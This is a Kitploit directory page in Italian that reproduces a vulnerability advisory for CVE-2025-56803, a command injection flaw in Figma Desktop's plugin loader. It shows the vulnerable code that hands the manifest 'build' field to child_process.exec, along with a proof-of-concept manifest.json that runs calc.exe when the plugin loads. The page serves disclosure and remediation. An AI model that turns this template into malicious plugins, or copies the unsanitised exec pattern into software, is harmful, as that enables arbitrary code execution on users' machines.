Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-56803 — Vulnerabilità di iniezione di comandi del sistema operativo tramite esecuzione di plugin in Figma Desktop Application | Kitploit
Strumenti/GitHubGitHub/yosasasutsut/cve-2025-56803
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubyosasasutsut/cve-2025-56803

CVE-2025-56803

Vulnerabilità di iniezione di comandi del sistema operativo tramite esecuzione di plugin in Figma Desktop Application

Vedi Repository
21 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-56803

Vulnerabilità di Iniezione di Comandi del Sistema Operativo tramite Esecuzione di Plugin in Figma Desktop Application

1. Panoramica

Icona Figma
  • Applicazione: Figma Desktop Application
  • Versione: 125.6.5
  • Vendor: Figma, Inc.
  • CWE: CWE-78: Neutralizzazione impropria di elementi speciali utilizzati in un comando del sistema operativo ('Iniezione di comandi del sistema operativo')
  • CVSS: 8.4
  • Vector String: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

2. Riassunto

Figma Desktop Application (v125.6.5) contiene una vulnerabilità di iniezione di comandi nel caricatore dei plugin.
Un plugin manifesto dannoso (manifest.json) può abusare del campo , che viene passato direttamente a senza validazione. Ciò consente l'esecuzione arbitraria di comandi del sistema operativo non appena il plugin viene caricato, senza avvisi di sicurezza o richieste di conferma.

build
child_process.exec()

3. Dettagli

La vulnerabilità deriva dal codice situato in main.js, che importa il modulo child_process integrato di Node.js:

root@kitploit:~
Zlt = require("child_process")

Successivamente, se il campo build è presente nel file manifest.json di un plugin e il suo valore è una stringa, l'applicazione esegue il valore direttamente utilizzando child_process.exec() senza alcuna sanificazione o validazione:

root@kitploit:~
if (
  s.build &&
  typeof s.build === "string" &&
  (l.path = process.env.PATH || "",
  await new Promise((g) => {
    (0, Zlt.exec)(s.build, { cwd: i }, (y, I, P) => {
      l.stdout = I;
      l.stderr = P;
      y && (l.buildErrCode = y.code);
      g();
    });
  }),
  l.buildErrCode
)
  return l;

Di conseguenza, il seguente file manifest.json contenuto in un plugin dannoso causerebbe l'esecuzione del valore del campo build come un comando del sistema operativo:

root@kitploit:~
{
  "name": "<NAME>",
  "id": "<ID>",
  "api": "1.0.0",
  "main": "code.js",
  "build": "<COMMAND>",
  "capabilities": [],
  "enableProposedApi": false,
  "documentAccess": "dynamic-page",
  "editorType": [
    "figma"
  ],
  "networkAccess": {
    "allowedDomains": [
      "none"
    ]
  }
}

Questo flusso di esecuzione è integrato nella logica di gestione dei plugin di Figma, e l'inclusione della chiamata require("child_process") in main.js conferma che l'esecuzione di comandi è costruita direttamente nella logica principale dell'applicazione.

4. Prova di Concetto (PoC)

Eseguendo un plugin che include il seguente manifest.json dannoso:

root@kitploit:~
{
  "name": "poc",
  "id": "1535549154235958412",
  "api": "1.0.0",
  "main": "code.js",
  "build": "calc.exe",
  "capabilities": [],
  "enableProposedApi": false,
  "documentAccess": "dynamic-page",
  "editorType": [
    "figma"
  ],
  "networkAccess": {
    "allowedDomains": [
      "none"
    ]
  }
}

Una volta che questo plugin viene registrato in Figma ed eseguito, il comando del sistema operativo specificato (calc.exe) viene eseguito immediatamente.

https://github.com/user-attachments/assets/48e0a47a-0d1c-4a92-b9ff-33e9559fd5e7

5. Raccomandazioni

Sebbene l'esecuzione del campo build sia una funzionalità ufficialmente supportata in Figma Desktop Application, l'applicazione dovrebbe evitare di fare affidamento su campi controllati dall'utente in manifest.json, come build, ove possibile.
Se tali campi devono essere supportati, devono essere sottoposti a una rigorosa validazione dell'input per prevenire l'iniezione di comandi.
Inoltre, dovrebbe essere evitato l'uso di child_process.exec() di Node.js, e dovrebbero essere adottate alternative più sicure con una gestione esplicita degli argomenti.

6. Riferimenti

  • https://www.cve.org/CVERecord?id=CVE-2025-56803
  • https://nvd.nist.gov/vuln/detail/CVE-2025-56803
  • https://www.figma.com/plugin-docs/manifest/
Scarica lo strumento